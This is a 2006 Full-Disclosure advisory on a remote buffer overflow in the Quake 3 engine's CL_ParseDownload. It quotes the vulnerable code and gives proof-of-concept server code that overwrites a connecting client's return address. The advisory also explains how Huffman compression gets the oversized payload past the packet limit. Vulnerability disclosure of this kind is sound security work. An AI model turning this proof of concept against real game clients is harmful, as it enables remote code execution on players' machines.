[Full-disclosure] Client buffer-overflow in Quake 3 engine (1.32c / rev 795)


#######################################################################

Luigi Auriemma

Application: Quake 3 engine
http://www.idsoftware.com
http://www.icculus.org/quake3/
Versions: Quake 3 <= 1.32c
Icculus.org Quake 3 <= revision 795
other derived projects
Games: exist many games which use the Quake 3 engine and
probably they are all vulnerable but I'm not able and
have no time to test them.
An enough complete list of these games is available here:
http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine
Platforms: Windows, *nix, *BSD, Mac and others
Bug: buffer-overflow in CL_ParseDownload
Exploitation: remote, versus client
Date: 02 Jun 2006
Author: Luigi Auriemma
e-mail: aluigi@xxxxxxxxxxxxx
web: aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Quake 3 engine is the famous game engine developed by id Software
(http://www.idsoftware.com) in the far 1999 but is still one of the
most used, licensed and played engines.
It has been released open source under the GPL license some months ago
and now it's mainly maintained by Icculus
(http://www.icculus.org/quake3/) although exist many other derived
projects.


#######################################################################

======
2) Bug
======


The CL_ParseDownload function located in code/client/cl_parse.c is used
by the clients for handling the download commands (svc_download)
received from the server.

The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN)
bytes:

void CL_ParseDownload ( msg_t *msg ) {
int size;
unsigned char data[MAX_MSGLEN];
...
size = MSG_ReadShort ( msg );
if (size > 0)
MSG_ReadData( msg, data, size );
...

Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but
is possible to bypass this limit through the huffman compression used
automatically and trasparently in the engine (thanx to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00)
bytes, which occupy a very small amount of space, followed by the
usual "stuff" (return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes
to avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so
the client can be attacked also immediately after the ending of the
connect handshake (just the first server's message).


#######################################################################

===========
3) The Code
===========


The server must be modified for sending the malformed svc_download
command and is possible to use the following instructions which
demonstrate how to overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the
"// send the gamestate" comment at about line 575:

// send the gamestate
int i;
MSG_WriteByte( &msg, svc_download );
MSG_WriteShort( &msg, -1 ); // block != 0, for fast return
MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
for(i = 0; i < 16384; i++) { // overwrite the data buffer
MSG_WriteByte(&msg, 0x00); // 0x00 for saving space
}
for(i = 0; i < 32; i++) { // do the rest of the job
MSG_WriteByte(&msg, 'a'); // return address: 0x61616161
}
SV_SendMessageToClient( &msg, client );
return;


#######################################################################

======
4) Fix
======


Icculus will fix the code soon.
I have tried to contact id Software too but it's only time lost...
The developers of the other derived projects and games have not been
contacted (almost all the games are no longer supported and it's a bit
long for me to find and contact each single developer of the other
open source projects).


#######################################################################


---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Client buffer-overflow in Quake 3 engine (1.32c / rev 795)
    ... Application: Quake 3 engine ... The Quake 3 engine is the famous game engine developed by id Software ... Note that the svc_download can be sent to the client in any moment so ... The developers of the other derived projects and games have not been ...
    (Bugtraq)
  • Re: Have you had good results with Trend Micro support?
    ... I had the same problem with server pattern would not update but all else ... would (the new 8.5 engine was installed on all servers and clients). ... XP/Vista clients and the SBS2k3R2 standard server software to include the ... server client, MSA and security server. ...
    (microsoft.public.windows.server.sbs)
  • Re: GAC hell
    ... These engines work with managed objects, much in the way WSH works with COM objects, but they're different engines, at least the JScript engine is. ... The VBScript seems to be doing a lot of stuff in unmanaged code, so for all I know, they're somehow using WSH underneath, but I doubt it since I don't see how it would deal with managed objects. ... So my question has to do with the resolution of referenced managed assemblies, ... The scripting engine is a COM client and COM uses the registry to locate the COM server DLLthat contains the components as referred to by the scripts. ...
    (microsoft.public.dotnet.languages.csharp)
  • Re: Have you had good results with Trend Micro support?
    ... customers are having issues with the new VSAPI 8.500.0.1002 engine on their ... running using the latest scan engine and it updates the server fine but all ... It's the SBS server's TM Client ... that it occurred around the time the virus engine was updated. ...
    (microsoft.public.windows.server.sbs)
  • Re: Have you had good results with Trend Micro support?
    ... "Our developers have checked the issue and has a hotfix for the said ... It worked on my server. ... would (the new 8.5 engine was installed on all servers and clients). ... server client, MSA and security server. ...
    (microsoft.public.windows.server.sbs)